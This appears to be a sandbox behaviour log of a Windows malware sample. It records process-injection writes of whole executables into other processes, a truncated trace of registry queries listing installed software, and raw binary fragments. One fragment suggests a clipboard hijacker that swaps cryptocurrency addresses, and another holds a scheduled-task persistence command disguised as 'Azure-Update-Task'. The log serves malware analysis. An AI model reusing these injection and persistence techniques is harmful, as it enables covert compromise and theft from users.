 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿|Ð%ì|Ð%ì|Ð%ìì}Ð%즻ìdÐ%즏ìùÐ%즎ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì|Ð$ìÐ%즊ìvÐ%즸ì}Ð%ìRich|Ð%ìPELŒÎ^à  0â‹z@@@D¨Pôhš@@.text“.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B
base_address: 0x00400000
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $J%[B+KB+KB+Kö·ºP+Kö·¸Ü+Kö·¹\+KR@+KVC+K܋ŒC+KyuH [+KyuN x+KyuO `+KKSØQ+KB+J¾+KÕuB +KÐu´C+KÕuI C+KRichB+KPELb•l`à ~î쎐@Ð@€ÀÚÜP0I ˜/`Â8ô˜Â@Ô.textù|~ `.rdataÖ_`‚@@.data9ðâ@À.tls 0ð@À.gfids0@ò@@.rsrc0IPJö@@.reloc˜/ 0@@B
base_address: 0x00400000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ€±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    ÜÓDàÖDÚÓD..€ñE<F<F<F<F<F<F<F<F<F„ñE@F@F@F@F@F@F@FˆñEÿÿÿÿ€ ÿÿÿÿàÖDØòEØòEØòEØòEØòEˆñE`ÙDàÚDðîDòEàöEC¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZàöEþÿÿÿPSTPDTùEPùEþÿÿÿu˜Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œd•D.?AVtype_info@@d•D.?AVbad_alloc@std@@d•D.?AVbad_array_new_length@std@@d•D.?AVlogic_error@std@@d•D.?AVlength_error@std@@d•D.?AVout_of_range@std@@d•D.?AV_Facet_base@std@@d•D.?AV_Locimp@locale@std@@d•D.?AVfacet@locale@std@@d•D.?AU_Crt_new_delete@std@@d•D.?AVcodecvt_base@std@@d•D.?AUctype_base@std@@d•D.?AV?$ctype@D@std@@d•D.?AV?$codecvt@DDU_Mbstatet@@@std@@d•D.?AVbad_exception@std@@d•D.Hd•D.?AVfailure@ios_base@std@@d•D.?AVruntime_error@std@@d•D.?AVsystem_error@std@@d•D.?AVbad_cast@std@@d•D.?AV_System_error@std@@d•D.?AVexception@std@@
base_address: 0x0045f000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x00463000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: ÍK²K”.'PAP”.P”.ÉÊ”.zÍq‡‡–ŽjŽ†PÎÕ½Õ›fCf”.”.›„îƒIPPNê•äpàRk\¤\¤×ì¯íÜ{LŒAÁiVüñæô3ûƒýù„ZlQg.œf b ErNPNWN]TUZ[4 äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x00464000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer:  €8€P€h€€ €Dè‚êD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo€000004b0,FileDescription 0FileVersion0.0.0.08 InternalNameuactest.exe(LegalCopyright @ OriginalFilenameuactest.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00408000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: ` p1
base_address: 0x0040a000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: 0 ð;
base_address: 0x00406000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

 buffer: Ø*è*ú*++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@ˆ%@È!@€!@ø#@P @à @˜ @%@ "@8!@B”` ´¸)¸B”`GCTL­.text$mn 0.idata$50 ˆ .rdata¸)´.rdata$zzzdbgl*(.idata$2”*.idata$3¨*0.idata$4Ø*¶.idata$60`.bss¨*`+ Ð*‚+( Ø*è*ú*++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObject†CloseHandle^ExitProcessåCreateProcessW­CopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll
base_address: 0x00402000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 1164
process_handle: 0x0000052c
0 0

WriteProcessMemory

 buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~0‹0‘0˜0ž0¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z1‚1‰1Ž1•1š1¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k22Ÿ2¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v3†3“3ª3Í3Ó3â3ñ3ú3 4¤4¶4Ç4Ô4à4í45515N5\5i5v5‚55¨5´5ß5ì5ù56!6L6Y6f66‘6Ÿ6¬6¹6È6Õ6î6777+777D7]7i7š7§7´7Í7æ7ÿ7818J8c8|8•8¡8Ô8í8ù8949U9`9g9q9y9ƒ9Œ9’9™9®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y=’=¢=>>>(>=>œ>©>¶>Ã>å>v?ƒ??? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9
base_address: 0x00404000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1164
process_handle: 0x0000052c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3056
process_handle: 0x00000394
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $8±K¿|Ð%ì|Ð%ì|Ð%ìì}Ð%즻ìdÐ%즏ìùÐ%즎ìOÐ%ìu¨¦ì~Ð%ìu¨¶ì{Ð%ì|Ð$ìÐ%즊ìvÐ%즸ì}Ð%ìRich|Ð%ìPELŒÎ^à  0â‹z@@@D¨Pôhš@@.text“.0 `.rdatalq@r4@@.data¨CÀ¦@À.reloc0+,¸@B
base_address: 0x00400000
process_identifier: 2408
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $J%[B+KB+KB+Kö·ºP+Kö·¸Ü+Kö·¹\+KR@+KVC+K܋ŒC+KyuH [+KyuN x+KyuO `+KKSØQ+KB+J¾+KÕuB +KÐu´C+KÕuI C+KRichB+KPELb•l`à ~î쎐@Ð@€ÀÚÜP0I ˜/`Â8ô˜Â@Ô.textù|~ `.rdataÖ_`‚@@.data9ðâ@À.tls 0ð@À.gfids0@ò@@.rsrc0IPJö@@.reloc˜/ 0@@B
base_address: 0x00400000
process_identifier: 2984
process_handle: 0x0000053c
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 2164
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 1920
process_handle: 0x000002b0
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 1164
process_handle: 0x0000052c
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 1164
process_handle: 0x0000052c
0 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
